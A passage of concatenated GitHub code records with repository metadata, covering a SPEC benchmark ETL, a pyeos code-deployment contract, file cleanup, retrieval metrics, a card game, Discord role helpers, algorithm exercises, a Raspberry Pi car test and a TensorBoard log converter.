= f\"{spec_model.system_series} ({spec_model.cpu_name})\"\n\n system = self._process_system(\n vendor.id, spec_model.hw_vendor, system_series, system_name,\n cpu, spec_model.chips, spec_model.nodes, spec_model.total_cores,\n spec_model.l1_cache, spec_model.l2_cache, spec_model.l3_cache,\n spec_model.memory, spec_model.memory_number, spec_model.memory_amount,\n spec_model.storage_type, spec_model.storage, spec_model.os,\n spec_model.file_system, spec_model.jvm, hw_avail.id\n )\n\n DwdTestInfo.objects.get_or_create(\n vendor_id=vendor.id, vendor_name=vendor.vendor, system_id=system.id,\n system_name=system_name, system_series_id=system_series.id, system_series_name=system_series.system_series,\n cpu_id=cpu.id, cpu_name=cpu.cpu_name, chips=system.chips, nodes=system.chips,\n total_cores=system.total_cores, l1_cache=system.l1_cache,\n l2_cache=system.l2_cache, l3_cache=system.l3_cache, memory=system.memory,\n memory_amount=system.memory_amount, memory_number=system.memory_number,\n storage_type=system.storage_type, storage=system.storage, os=system.os,\n file_system=system.file_system, jvm=system.jvm, hw_avail_id=hw_avail.id,\n result=spec_model.result, suite_id=suite.id, suite_name=suite.suite,\n test_date_id=test_date.id, url_suffix=spec_model.url_suffix, full_url=spec_model.full_url,\n )\n DwdSubmitInfo.objects.get_or_create(\n vendor_id=vendor.id, vendor_name=vendor.vendor, system_id=system.id,\n system_name=system.system_name, system_series_id=system_series.id,\n system_series_name=system_series.system_series,\n suite_id=suite.id, suite_name=suite.suite, submit_year=spec_model.submit_year,\n submit_quarter=spec_model.submit_quarter, url_suffix=spec_model.url_suffix,\n full_url=spec_model.full_url,\n )\n\n @classmethod\n def _process_system(cls, vendor_id, hw_vendor, system_series, system_name, cpu, chips,\n nodes, total_cores, l1_cache, l2_cache, l3_cache, memory,\n memory_number, memory_amount, storage_type, storage, os,\n file_system, jvm, hw_avail_id):\n obj, created = DimSystem.objects.get_or_create(\n vendor_id=vendor_id, vendor_name=hw_vendor, system_series_id=system_series.id,\n system_series_name=system_series.system_series,\n system_name=system_name, cpu_id=cpu.id, cpu_name=cpu.cpu_name, chips=chips, nodes=nodes,\n total_cores=total_cores,\n l1_cache=l1_cache, l2_cache=l2_cache, l3_cache=l3_cache, memory=memory,\n memory_number=memory_number, memory_amount=memory_amount, storage_type=storage_type,\n storage=storage, os=os, file_system=file_system, jvm=jvm, hw_avail_id=hw_avail_id,\n )\n return obj\n\n @classmethod\n def _process_vendor(cls, hw_vendor):\n obj, created = DimVendor.objects.get_or_create(vendor=hw_vendor)\n return obj\n\n @classmethod\n def _process_cpu(cls, cpu_vendor, cpu_name, cpu_ghz, max_ghz, cores, threads_per_core):\n obj, created = DimCpu.objects.get_or_create(\n cpu_vendor=cpu_vendor, cpu_name=cpu_name, cpu_ghz=cpu_ghz, max_ghz=max_ghz,\n cores=cores, threads_per_core=threads_per_core\n )\n return obj\n\n def _process_suite(self, suite):\n category, benchmark = self._parse_suite(suite)\n obj, created = DimSuite.objects.get_or_create(category=category, benchmark=benchmark, suite=suite)\n return obj\n\n def _process_date(self, date_str):\n year, quarter, month, day = self._parse_date(date_str)\n obj, created = DimDate.objects.get_or_create(year=year, quarter=quarter, month=month, day=day,\n full_date=date_str)\n return obj\n\n @classmethod\n def _parse_suite(cls, suite):\n if 'SPECfp' in suite or 'SPECint' in suite:\n category = 'cpu'\n benchmark = 'cpu2006'\n elif '2017' in suite:\n category = 'cpu'\n benchmark = 'cpu2017'\n elif 'jbb2015' in suite:\n category = 'java'\n benchmark = 'jbb2015'\n elif 'jvm2008' in suite:\n category = 'java'\n benchmark = 'jvm2008'\n else:\n category = 'power'\n benchmark = 'ssj2008'\n return category, benchmark\n\n @classmethod\n def _parse_date(cls, date_str: datetime.date):\n year = int(date_str.strftime('%Y'))\n month = int(date_str.strftime('%m'))\n day = int(date_str.strftime('%d'))\n quarter = (month - 1) // 3 + 1\n return year, quarter, month, day\n\n @classmethod\n def _process_system_series(cls, system_series):\n obj, created = DimSystemSeries.objects.get_or_create(system_series=system_series)\n return obj\n\n\ndef main():\n build_dim_dwd = BuildDimDwd()\n build_dim_dwd.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ScottWong98/spec_dc","sub_path":"dim/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72995156668","text":"from eoslib import *\nfrom backyard.token import transfer\n\ncode = N('codestore')\n\ndef deploy(mod_name, src_code):\n print('++++++++++++deploy:mod_name', mod_name)\n id = hash64(mod_name)\n itr = db_find_i64(code, code, code, id)\n if itr < 0:\n db_store_i64(code, code, code, id, src_code)\n else:\n db_update_i64(itr, code, src_code)\n\n mod_name = mod_name.decode('utf8')\n if mod_name.endswith('.mpy'):\n __import__('codestore.'+mod_name[:-4])\n elif mod_name.endswith('.py'):\n __import__('codestore.'+mod_name[:-3])\n\ndef apply(receiver, code, action):\n if action == N('sayhello'):\n require_auth(N('codestore'))\n msg = read_action()\n print(msg.decode('utf8'))\n elif action == N('deploy'):\n require_auth(code)\n msg = read_action()\n length = int.from_bytes(msg[:1], 'little')\n mod_name = msg[1:1+length]\n src_code = msg[1+length:]\n# print('+++++++++++++++++src_code type:', src_code[0])\n# print(src_code)\n deploy(mod_name, src_code)\n elif action == N('transfer'):\n msg = read_action()\n print('transfer', msg)\n t = transfer()\n t.unpack(msg)\n t.p()\n auction = SimpleAuction()\n auction.bid(t._from, t.amount)","repo_name":"learnforpractice/pyeos","sub_path":"programs/pyeos/tests/python/codestore/codestore.py","file_name":"codestore.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"6"} +{"seq_id":"72810206907","text":"import os\n\nclass LetsCleanIt:\n @staticmethod\n def CleanAll():\n files_to_remove = [\n 'scrapped_tweets.csv',\n 'cleaned_tweets.csv',\n 'translated_tweets.csv',\n 'tweets_with_sentiment.csv',\n 'tweets_with_categories.csv',\n 'databaseOK.txt',\n 'wordcloud.png',\n 'piechart.png',\n 'time_series.png',\n 'anomalies.png',\n 'logs.log',\n 'geckodriver.log',\n ]\n \n for file in files_to_remove:\n if os.path.exists(file):\n os.remove(file)\n\nif __name__ == '__main__':\n LetsCleanIt.CleanAll()","repo_name":"NebyX1/data-science-engineering-end-to-end-project-bootcamp-milei-twitter-scraping","sub_path":"clean_all.py","file_name":"clean_all.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2140138554","text":"import os,sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilename1 = '/data/nefilter1.bin'\nfilename2 = '/data/nefilter2.bin'\n\n# >i4 32bit int, big endian\n# \").strip(), article2.details.description, \"description\")\r\n else:\r\n self.assertEqual(article.details.description, article2.details.description, \"description\")\r\n if article.details.manufacturerArticleId is None and article2.details.manufacturerArticleId is not None:\r\n self.assertEqual(article.productId, article2.details.manufacturerArticleId, \"manufacturerArticleId\")\r\n else:\r\n self.assertEqual(article.details.manufacturerArticleId, article2.details.manufacturerArticleId, \"manufacturerArticleId\")\r\n\r\n self.assertEqual(article.details.manufacturerName, article2.details.manufacturerName, \"manufacturerName\")\r\n\r\n if len(article.details.keywords) > 0:\r\n self.assertEqual(article.details.keywords, article2.details.keywords, \"keywords\")\r\n if len(article.details.specialTreatmentClasses) > 0 and len(article2.details.specialTreatmentClasses) > 0:\r\n self.assertEqual(article.details.specialTreatmentClasses, article2.details.specialTreatmentClasses, \"specialTreatmentClasses\")\r\n\r\n self.assertEqual(article.details.erpGroupBuyer, article2.details.erpGroupBuyer, \"erpGroupBuyer\")\r\n self.assertEqual(article.details.erpGroupSupplier, article2.details.erpGroupSupplier, \"erpGroupSupplier\")\r\n self.assertEqual(article.details.remarks, article2.details.remarks, \"remarks\")\r\n self.assertEqual(article.details.buyerId, article2.details.buyerId, \"buyerId\")\r\n self.assertEqual(article.details.segment, article2.details.segment, \"segment\")\r\n self.assertEqual(article.details.articleOrder, article2.details.articleOrder, \"articleOrder\")\r\n self.assertEqual(article.details.articleStatus, article2.details.articleStatus, \"articleStatus\")\r\n if article.details.supplierAltId is not None and article2.details.supplierAltId is not None:\r\n self.assertEqual(article.details.supplierAltId, article2.details.supplierAltId, \"supplierAltId\")\r\n\r\n self.assertEqual(article.details.manufacturerTypeDescription, article2.details.manufacturerTypeDescription, \"manufacturerTypeDescription\")\r\n\r\n self.assertEqual(article.orderDetails, article2.orderDetails, \"orderDetails\")\r\n self.assertEqual(article.priceDetails, article2.priceDetails, \"priceDetails\")\r\n self.assertEqual(article.priceDetails[0], article2.priceDetails[0], \"priceDetails[0]\")\r\n\r\n self.assertEqual(len(article.featureSets), len(article2.featureSets), \"len(featureSets)\")\r\n if len(article.featureSets) > 0:\r\n self.assertEqual(len(article.featureSets[0]), len(article2.featureSets[0]), \"len(featureSets[0])\")\r\n self.assertEqual(article.featureSets[0].referenceSystem, article2.featureSets[0].referenceSystem, \"featureSets.referenceSystem\")\r\n self.assertEqual(article.featureSets[0].features[0].name, article2.featureSets[0].features[0].name, \"feature[0].name\")\r\n self.assertEqual(article.featureSets[0].features[0], article2.featureSets[0].features[0], \"feature[0]\")\r\n\r\n self.assertEqual(article.featureSets[0], article2.featureSets[0], \"featureSet[0]\")\r\n self.assertEqual(article.featureSets, article2.featureSets, \"featureSets\")\r\n self.assertEqual(article.mimeInfo, article2.mimeInfo, \"mimeInfo\")\r\n self.assertEqual(3, len(article2.mimeInfo), \"mimeInfo\")\r\n if len(article.references) > 0 and len(article2.references) > 0 :\r\n self.assertEqual(article.references, article2.references, \"references\")\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# import sys;sys.argv = ['', 'Test.testName']\r\n# unittest.main()\r\n","repo_name":"HenrikPilz/BMEcatConverter","sub_path":"src/test/handler/xml/xmlImportTest.py","file_name":"xmlImportTest.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"2977242339","text":"'''\n\nINFO: Данный файл содержит класс ExpAnalizer для оценки качества модели\n\nОписание: В отличии от обычного анализа, теперь можно задать эпсилон окресность правильных статей\nТ.Е теперь правильная статья не 1, а 1 + 2 * epsilon\n\n'''\n\n\nimport matplotlib.pyplot as plt\nimport math\nimport os\nfrom tools.inverse_index import InvIndex\nfrom tools.relative_paths_to_directories import path_to_directories\n\nPATH_TO_ROOT, PATH_TO_TOOLS, PATH_TO_FILES, PATH_TO_TF_IDF, PATH_TO_INV_IND, PATH_TO_BM_25,\\\n PATH_TO_LEARNING_TO_RANK = path_to_directories(os.getcwd())\n\n\nclass ExpAnalizer:\n # sample - выборка (массив структур Запрос (request) из pravoved_recognizer.py)\n # answers - ответы модели (массив i эл-т которого - массив содержащий отсортированные по релевантности ответы на\n # i-ый запрос выборки в виде (номер в нашей нумерации))\n # epsilon - параметр Epsilon (см. описание)\n def __init__(self, answers, sample, epsilon):\n self.sample = sample\n self.answers = answers\n self.epsilon = epsilon\n self.id_to_num = {}\n invInd = InvIndex.load(PATH_TO_INV_IND)\n self.num_to_id = {}\n for doc_num, doc_id in enumerate(invInd.doc_ids):\n self.id_to_num[doc_id] = doc_num\n self.num_to_id[doc_num] = doc_id\n\n @staticmethod\n def save_graphics(x, metric, ylabel: str, name_file: str):\n plt.plot(x, metric, color='red', label='Статьи')\n plt.ylabel(ylabel)\n plt.xlabel('Количество статей в топе')\n plt.legend()\n plt.savefig(os.path.join(PATH_TO_FILES, 'metrics_count', f'{name_file}_exper.png'))\n plt.show()\n\n # n - верхняя граница на количество статей в топе\n def top_n_cover(self, n, in_percent=True):\n\n x = []\n y_codex = []\n y_articles = []\n\n for i in range(1, n, 2):\n codex = 0\n article = 0\n both = 0\n ind = 0\n for samp in self.sample:\n cod = 0\n art = 0\n answer = self.answers[ind][:i]\n ind += 1\n for ans in answer:\n if ans[0] == samp['codex']:\n cod = 1\n right_ans = (str(samp['codex']), samp['norm'])\n if self.id_to_num.get(right_ans, -100) - self.epsilon <= self.id_to_num[(ans)]\\\n <= self.id_to_num.get(right_ans, -100) + self.epsilon:\n art = 1\n if cod == 1 and art == 1:\n both += 1\n elif cod == 1:\n codex += 1\n elif article == 1:\n art += 1\n\n x.append(i)\n y_codex.append(codex + both)\n y_articles.append(both)\n\n if (not in_percent):\n plt.plot(x, y_codex, color='blue', label='Кодексы')\n plt.plot(x, y_articles, color='red', label='Статьи')\n plt.title('Покртие в зависимости от количества статей в топе')\n plt.ylabel('Попаданий')\n plt.xlabel('Количество статей в топе')\n plt.legend()\n plt.show()\n\n else:\n for i in range(len(y_articles)):\n y_articles[i] /= len(self.sample)\n y_codex[i] /= len(self.sample)\n plt.plot(x, y_codex, color='blue', label='Кодексы')\n plt.plot(x, y_articles, color='red', label='Статьи')\n plt.title('Покртие в зависимости от количества статей в топе')\n plt.ylabel('Попаданий (в процентах)')\n plt.xlabel('Количество статей в топе')\n plt.legend()\n plt.show()\n\n\n\n @staticmethod\n def ap_k(relev_positions, k):\n ans = 0\n num_rel = 0\n for rl in relev_positions:\n if rl <= k:\n num_rel += 1\n ans += num_rel / rl\n return ans\n else:\n break\n return ans\n\n def map_k(self, K):\n apk = [0] * ((K + 1) // 2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((ans[0], ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n apk[k // 2] += self.ap_k(relev_positions, k)\n apk = [a / len(self.sample) for a in apk]\n x = [i for i in range(1, K + 1, 2)]\n print(\"exper_map: \", apk)\n self.save_graphics(x=x, metric=apk, ylabel='MAP(k)', name_file='map')\n\n def ndcg(self, K):\n ndcg = [0] * ((K + 1) // 2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((str(ans[0]), ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n for r in relev_positions:\n if r <= k:\n ndcg[k // 2] += 1/math.log(r + 1, 2)\n break\n ndcg = [a / len(self.sample) for a in ndcg]\n print(\"exper_ndcg: \", ndcg)\n x = [i for i in range(1, K + 1, 2)]\n self.save_graphics(x=x, metric=ndcg, ylabel='NDCG(k)', name_file='ndcg')\n\n\n\n\n @staticmethod\n def mrr_k(relev_positions, k):\n for rl in relev_positions:\n if rl <= k:\n return 1 / rl\n return 0\n\n def mrr(self, K):\n mrr = [0] * ((K + 1) // 2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((ans[0], ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n mrr[k // 2] += self.mrr_k(relev_positions, k)\n mrr = [a / len(self.sample) for a in mrr]\n x = [i for i in range(1, K + 1, 2)]\n print(\"exper_mrr:\", mrr)\n\n self.save_graphics(x=x, metric=mrr, ylabel='MRR', name_file='mrr')\n\n","repo_name":"sh-anton8/find_norm","sub_path":"experiment_analiz.py","file_name":"experiment_analiz.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24274924598","text":"import sys, os, random\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))\n\nfrom eightcards.environment.card import Card\nfrom eightcards.environment.player import Player\n\nclass Board:\n\n def __init__(self):\n self.cards = []\n self.players = []\n self.pile = []\n self.trump = None\n self.defender = None\n self.attacker = None\n self.turns = 1\n self.__turn_end = False\n self.winner = None\n \n @property\n def turn_end(self):\n return self.__turn_end\n\n @turn_end.setter\n def turn_end(self, value):\n self.__turn_end = value\n\n\n @property\n def pile_number(self):\n return len(self.pile)\n\n def init_board(self):\n\n self._init_pile()\n self._init_players()\n\n for player in self.players:\n self._deal(player)\n\n self.trump = random.choice(['Heart', 'Spade', 'Club', 'Diamond'])\n\n print(\"Turn 1 -- Number of left cards: \" + str(self.pile_number))\n\n return\n\n def _init_pile(self):\n for suit in ['Heart', 'Spade', 'Club', 'Diamond']:\n for number in range(1, 14):\n self.pile.append(Card(suit, number, self))\n self.pile.extend([Card('Joker', -2, self), Card('Joker', -1, self)])\n random.shuffle(self.pile)\n return\n\n def _init_players(self, num_player=2):\n for j in range(num_player):\n self.players.append(Player(\"Player \" + str(j+1)))\n flag = random.randint(0, num_player-1)\n self.defender = self.players[flag]\n self.attacker = self.players[flag-1]\n # for player in self.players:\n # if not player.identity:\n # player.identity = 'Assist'\n return\n\n def _deal(self, player):\n\n while player.hand_number < 8 and self.pile_number > 0:\n card = self.pile.pop()\n player.hand.append(card)\n if self.pile_number == 0:\n break\n \n return\n\n def attack_action(self):\n\n if self.attacker.no_hand:\n self._end_turn('abandon')\n return\n\n\n print(\"\\n\" + self.attacker.name + \": You are now the attacker. \" + \" (Trump is \" + str(self.trump) +\") Your hand is: \\n\")\n # print(self.attacker.hand)\n print(\" \".join(str(card.show()) for card in self.attacker.hand))\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards))\n title = \"\\n Please use a card to attack (input 'abandon' to abandon attacking):\"\n while True:\n\n input_str = input(title)\n\n if input_str == 'abandon':\n self._end_turn(input_str)\n break\n \n card = self.attacker.get_card_by_str(input_str)\n\n if not card:\n \n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n elif self.attacker.attack(card):\n self.cards.append(card)\n\n if self.attacker.no_hand and self.pile_number == 0:\n self.winner = self.attacker\n self.end_game()\n\n break\n\n else:\n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n return\n \n\n def defend_action(self):\n print(\"\\n\" + self.defender.name + \": You are now the defender. \" + \" (Trump is \" + str(self.trump) + \") Your hand is: \\n\")\n print(\" \".join(str(card.show()) for card in self.defender.hand))\n # print(self.defender.hand)\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards))\n title = \"\\nPlease use a card to defend (input 'surrender' to surrender this turn):\"\n while True:\n\n input_str = input(title)\n\n if input_str == 'surrender':\n self._end_turn(input_str)\n break\n \n card = self.defender.get_card_by_str(input_str)\n\n if not card:\n \n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n\n elif self.defender.defend(card):\n self.cards.append(card)\n\n if self.defender.no_hand:\n if self.pile_number == 0:\n self.winner = self.defender\n self.end_game()\n else:\n self._end_turn()\n\n break\n\n else:\n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n return\n\n def hunt_action(self):\n print(\"\\n\" + self.attacker.name + \": You are now the attacker. \" + \" (Trump is \" + str(self.trump) +\") Your hand is: \\n\")\n print(\" \".join(str(card.show()) for card in self.attacker.hand))\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards)) \n print(\"\\nThe defender has surrendered. Please choose the cards to hunt (Press 'Enter' twice to confirm): \\n\")\n \n input_str = input()\n num_hunt_cards = 1\n\n while input_str != '' and num_hunt_cards <= self.defender.hand_number:\n card = self.attacker.get_card_by_str(input_str)\n\n if not card: \n\n print(\"\\nThe card you chose is not valid. Please choose another one: \\n\")\n\n elif self.attacker.attack(card):\n self.cards.append(card)\n\n if self.attacker.no_hand and self.pile_number == 0:\n self.winner = self.attacker\n self.end_game()\n\n else:\n\n print(\"\\nThe card you chose is not valid. Please choose another one: \\n\")\n\n input_str = input()\n num_hunt_cards += 1\n\n return\n\n\n def _end_turn(self, input_str=None):\n\n if input_str == 'surrender':\n self.hunt_action()\n while self.cards:\n card = self.cards.pop()\n self.defender.hand.append(card)\n \n else:\n print(\"\\n\" + self.defender.name + \": You are now the defender. \" + \" (Trump is \" + str(self.trump) + \") Your hand is: \\n\")\n print(\" \".join(str(card.show()) for card in self.defender.hand))\n # print(self.defender.hand)\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards))\n title = \"\\nDo you want to surrender? (y/n): \"\n answer = input(title)\n if answer not in ['n', 'N', 'no', 'No', 'NO']:\n self.defender.hand.extend(self.cards)\n else:\n self.attacker, self.defender = self.defender, self.attacker\n\n self.cards = []\n self._deal(self.attacker)\n self._deal(self.defender)\n self.turns += 1\n self.turn_end = True\n\n print(\"\\nTurn \" + str(self.turns) + \" -- Number of left cards: \" + str(self.pile_number)) \n \n\n def is_end(self):\n return self.winner is not None\n\n def end_game(self):\n print(\"\\nWINNER IS \" + self.winner.name + \"!!!\")\n sys.exit(0)\n\n\n\n","repo_name":"hengjiwang/eightcards","sub_path":"eightcards/environment/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20395449752","text":"import discord\n\n\nclass Roles:\n def __init__(self, guild: discord.Guild):\n self.dg_guild = guild\n self.staff_role = self.dg_guild.get_role(1054151799516446742) # @・STAFF 0\n self.support_role = self.dg_guild.get_role(1103969370692141078) # @・Support 1\n self.control_role = self.dg_guild.get_role(1053766515700273172) # @・Control 2\n self.moder_role = self.dg_guild.get_role(1053692457625333830) # @・Moderator 3\n self.curator_role = self.dg_guild.get_role(1019585554016391199) # @・Curator 4\n self.admin_role = self.dg_guild.get_role(957249264751378492) # @・Administrator 5\n self.transparent1_role = self.dg_guild.get_role(921729278188597259) # пустышка админка которая в самом низу 6\n self.heart_role = self.dg_guild.get_role(960642805099810816) # @🤍 7 \n self.cloud_role = self.dg_guild.get_role(960643635613933661) # @☁️ 8\n self.raincloud_role = self.dg_guild.get_role(960642444498731108) # @🌩 9\n self.transparent2_role = self.dg_guild.get_role(937676066066149407) # пустышка админка которая под скрепкой 10\n self.clip_role = self.dg_guild.get_role(980837561335414785) # @🧷 11\n self.deathgun_role = self.dg_guild.get_role(989882589600948234) # @Death Gun 12\n \n def get_all_staff_roles(self):\n staff_roles_list = [\n self.staff_role,\n self.support_role,\n self.control_role,\n self.moder_role, \n self.curator_role,\n self.admin_role,\n self.transparent1_role,\n self.heart_role,\n self.cloud_role,\n self.raincloud_role,\n self.transparent2_role,\n self.clip_role,\n self.deathgun_role\n ]\n return staff_roles_list\n \n def roles_check(self, *, member: discord.Member, roles_list: list):\n return [x for x in member.roles if x in roles_list]\n","repo_name":"metamorrphosis/death-gun","sub_path":"utils/staff_roles.py","file_name":"staff_roles.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"810189166","text":"'''Capacity To Ship Packages Within D Days - https://leetcode.com/problems/capacity-to-ship-packages-within-d-days/\n\nA conveyor belt has packages that must be shipped from one port to another within days days.\n\nThe ith package on the conveyor belt has a weight of weights[i]. Each day, we load the ship with packages on the\nconveyor belt (in the order given by weights). We may not load more weight than the maximum weight capacity of the ship.\n\nReturn the least weight capacity of the ship that will result in all the packages on the conveyor belt being shipped\nwithin days days.\n\nExample 1:\n\nInput: weights = [1,2,3,4,5,6,7,8,9,10], days = 5\nOutput: 15\nExplanation: A ship capacity of 15 is the minimum to ship all the packages in 5 days like this:\n1st day: 1, 2, 3, 4, 5\n2nd day: 6, 7\n3rd day: 8\n4th day: 9\n5th day: 10\n\nNote that the cargo must be shipped in the order given, so using a ship of capacity 14 and splitting the packages\ninto parts like (2, 3, 4, 5), (1, 6, 7), (8), (9), (10) is not allowed.\n'''\n\n\nclass Solution:\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n\n def getShipmentCapacity(mid):\n day = 0\n i = 0\n while i < len(weights):\n capacity = mid\n while i < len(weights):\n if capacity < weights[i]:\n break\n else:\n capacity -= weights[i]\n i += 1\n day += 1\n return day\n\n left = max(weights)\n right = sum(weights)\n while left < right:\n mid = left + (right - left) // 2\n shipping_days = getShipmentCapacity(mid)\n if shipping_days <= days:\n right = mid\n else:\n left = mid + 1\n return left","repo_name":"Saima-Chaity/Leetcode","sub_path":"Array_String/Capacity To Ship Packages Within D Days.py","file_name":"Capacity To Ship Packages Within D Days.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30477744560","text":"# Reverse an Array\n\n# Brute Force\ndef reverseArray(arr, n):\n left = 0\n right = n - 1\n while left < right:\n arr[left], arr[right] = arr[right], arr[left]\n left += 1\n right -= 1\n\n return arr\n\n\narr = [1, 2, 3, 4, 5]\nn = len(arr)\nprint(reverseArray(arr, n))\n\n\n\n# Recursive Way\ndef reverseArray(arr, left, right):\n if left >= right:\n return\n arr[left], arr[right] = arr[right], arr[left]\n \n reverseArray(arr, left + 1, right - 1)\n\narr = [1, 2, 3, 4, 5]\nreverseArray(arr, 0, 4)\nprint(arr)","repo_name":"prabhat-gp/GFG","sub_path":"Arrays/Love Babbar/1_reverse_array.py","file_name":"1_reverse_array.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1432999490","text":"import logging\nfrom collections import defaultdict\n\nimport numpy as np\nimport stk\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConstructedAnalyser:\n \"\"\"\n Analyses geometry of building blocks in constructed molecules.\n\n WARNING: This code is only present in the latest versions of stko\n that require Python 3.11!\n\n \"\"\"\n\n def get_building_block_atom_ids(\n self,\n molecule: stk.ConstructedMolecule,\n ) -> dict[int | None, list[int]]:\n \"\"\"\n Get the centroids of all building blocks.\n\n Parameters:\n\n molecule:\n Molecule to analyse.\n\n \"\"\"\n\n atom_ids = defaultdict(list)\n for atom in molecule.get_atom_infos():\n if atom.get_building_block_id() is None:\n continue\n bb_id = atom.get_building_block_id()\n atom_ids[bb_id].append(atom.get_atom().get_id())\n return atom_ids\n\n def get_building_block_centroids(\n self,\n molecule: stk.ConstructedMolecule,\n ) -> dict[int | None, np.ndarray]:\n \"\"\"\n Get the centroids of all building blocks.\n\n Parameters:\n\n molecule:\n Molecule to analyse.\n\n \"\"\"\n\n atom_ids = self.get_building_block_atom_ids(molecule)\n centroids = {\n i: molecule.get_centroid(atom_ids=atom_ids[i]) for i in atom_ids\n }\n return centroids\n","repo_name":"JelfsMaterialsGroup/stko","sub_path":"src/stko/_internal/molecular/constructed/constructed_analysis.py","file_name":"constructed_analysis.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"6"} +{"seq_id":"23101331464","text":"import RPi.GPIO as GPIO\nimport time\n\n# set up raspberry pi pins that are connected to the H-Bridge L298N\n# The motors are wired to the H-Bridge which are plugged in to the corresponding pins on the Pi (7,11,13,15)\n# CAUTION: plugging the motors to the pi will damage it. An H-Bridge or motor controller is needed.\n\n# This test the robot car to draw a square: Go straight then turn right 4 times\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(7, GPIO.OUT)\nGPIO.setup(11, GPIO.OUT)\nGPIO.setup(13, GPIO.OUT)\nGPIO.setup(15, GPIO.OUT)\n\nprint(\"get ready\")\n\nfor x in xrange(0,4):\n #both forward\n GPIO.output(7, True)\n GPIO.output(13, True)\n time.sleep(2)\n \n #short pause\n GPIO.output(7, False)\n GPIO.output(13, False)\n time.sleep(.2)\n \n #sharp turn (pin 7 makes left goes forward, pin 15 makes right goes backward)\n GPIO.output(7, True)\n GPIO.output(15, True)\n time.sleep(.97)\n \n # turn off motors\n GPIO.output(7, False)\n GPIO.output(15, False)\n\nGPIO.cleanup()\n","repo_name":"megatran/pubnub_iot_tinkering","sub_path":"other_tests/pubnubcar_testrun_square.py","file_name":"pubnubcar_testrun_square.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28315501041","text":"import argparse\nfrom glob import glob\nimport pandas as pd\nimport progressbar\n\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Convert Tensorboard data to csv')\n # Common arguments\n parser.add_argument('--path', type=str, default='data/action_representations_tunnel',\n help='the directory with tensorboard logs sorted by seeds')\n\n args = parser.parse_args()\n\n path = args.path\n in_dirs = glob(f\"{path}/seed_*/results/*\")\n big_df = None\n big_df_eval = None\n for in_dir in progressbar.progressbar(in_dirs):\n seed = int(next(i for i in in_dir.split('/') if i.startswith('seed')).split('_')[1])\n name = in_dir.split('/')[-1]\n x = EventAccumulator(in_dir)\n x.Reload()\n tags = x.Tags().get('scalars')\n df = None\n df_eval = None\n for tag in tags:\n col = pd.DataFrame(x.Scalars(tag)).drop(columns=\"wall_time\").rename(columns={'value': tag})\n if 